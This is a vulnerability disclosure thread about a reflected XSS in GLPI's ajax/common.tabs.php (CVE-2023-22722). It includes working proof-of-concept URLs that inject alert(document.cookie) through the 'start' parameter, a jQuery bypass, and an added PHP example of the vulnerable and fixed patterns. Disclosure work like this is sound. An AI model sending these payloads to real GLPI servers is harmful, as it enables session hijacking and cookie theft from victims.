Authenticated Reflected XSS on ajax/common.tabs.php in glpi-project/glpi

Valid

Reported on

Dec 12th 2022


Description

There is a reflected XSS vulnerability on ajax/common.tabs.php due to the KnowBase tab not escaping the start parameter properly (probably because it's not reflected inside quotes).

Some work went into getting the exploit working, because jQuery's $() is not defined on this page and causes a ReferenceError. This could be bypassed by re-defining a function with the same name that does nothing and then proceeding to write the payload after it. After some tweaking, the payload looked like this:

1})}});alert(document.cookie);(function a(){function b(){(function c(){

Proof-of-Concept (PoC)

This PoC will trigger an alert containing the browser cookies.

http://localhost/ajax/common.tabs.php?_glpi_tab=KnowBase$2&_itemtype=KnowBase&start=1})}});alert(document.cookie);(function%20a(){function%20b(){(function%20c(){

Impact

An attacker can persuade a victim into opening a URL containing a payload exploiting this vulnerability. After exploited, the attacker can make actions as the victim or exfiltrate session cookies.
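The root cause described above is a server-side one: a request parameter is written into an inline script block without being escaped, and without surrounding quotes, so anything that closes the enclosing JavaScript expression runs as code. The following PHP snippet is an added illustration of that pattern and of two ways to close it; it is not GLPI's code (the page does not show the affected source), and the function names, the loadPage() call and the probe string are all constructed for the example.

```php
<?php
// Added example, not code from GLPI. Shows why an unescaped parameter
// reflected into an inline <script> is an XSS sink and how to neutralize it.

// Hypothetical vulnerable renderer: the raw parameter lands in JS verbatim,
// outside any quotes, so a value that closes the object literal and the
// enclosing call can append arbitrary statements.
function render_vulnerable(string $start): string
{
    return "<script>$(function(){ loadPage({start: " . $start . "}); });</script>";
}

// Hardened, preferred form for a pagination offset: it is an integer, so
// treat it as one. Anything that is not a non-negative integer collapses to 0.
function render_hardened_int(string $start): string
{
    $page = max(0, (int) $start);
    return "<script>$(function(){ loadPage({start: " . $page . "}); });</script>";
}

// Hardened form for values that really are strings: json_encode() produces a
// quoted JS literal, and the HEX flags also encode < > & ' " so the literal
// cannot terminate the <script> element or break out of its quotes.
function render_hardened_json(string $value): string
{
    $js = json_encode($value, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);
    return "<script>$(function(){ loadPage({start: " . $js . "}); });</script>";
}

// Constructed probe (not the payload from the report): closes the object and
// the function call, then starts a new statement.
$probe = "1}); alert(1); ({";

echo render_vulnerable($probe), "\n";    // probe is emitted as live JavaScript
echo render_hardened_int($probe), "\n";  // start: 1
echo render_hardened_json($probe), "\n"; // start: "1}); alert(1); ({" as an inert string
```

When reviewing a fix for this class of bug, check which of the two hardened shapes applies: an offset, id or count should be cast to int before it reaches the template, while free-form strings need json_encode() with the HEX flags (or the framework's equivalent JS-context encoder). HTML escaping alone is not sufficient inside a script block, because it does not neutralize the `})` sequence that this report relies on.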

We are processing your report and will contact the glpi-project/glpi team within 24 hours. a year ago
Celesian
a year ago

Researcher


I have provided the wrong PoC. The following PoC includes the undefined JQuery bypass.

http://localhost/ajax/common.tabs.php?_glpi_tab=KnowBase$2&_itemtype=KnowBase&start=http://localhost/ajax/common.tabs.php?_glpi_tab=KnowBase$2&_itemtype=KnowBase&start=1})}});alert(document.cookie);function%20$(a){};(function%20a(){function%20b(){(function%20c(){
We have contacted a member of the glpi-project/glpi team and are waiting to hear back a year ago
glpi-project/glpi maintainer has acknowledged this report a year ago
Alexandre Delaunay validated this vulnerability a year ago
c3l3si4n has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Cédric Anne
a year ago

Maintainer


@admin we reevaluated the severity to 4.8 (CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:N/A:N). Could you please change this?

Cédric Anne
a year ago

Maintainer


https://github.com/glpi-project/glpi/security/advisories/GHSA-352j-wr38-493c

Ben Harvie
a year ago

Admin


Hi Cédric Anne, I have updated the CVSS as you requested.

Cédric Anne marked this as fixed in 10.0.6 with commit 902e78 a year ago
The fix bounty has been dropped
This vulnerability has now been published a year ago
Cédric Anne
a year ago

Maintainer


CVE-2023-22722
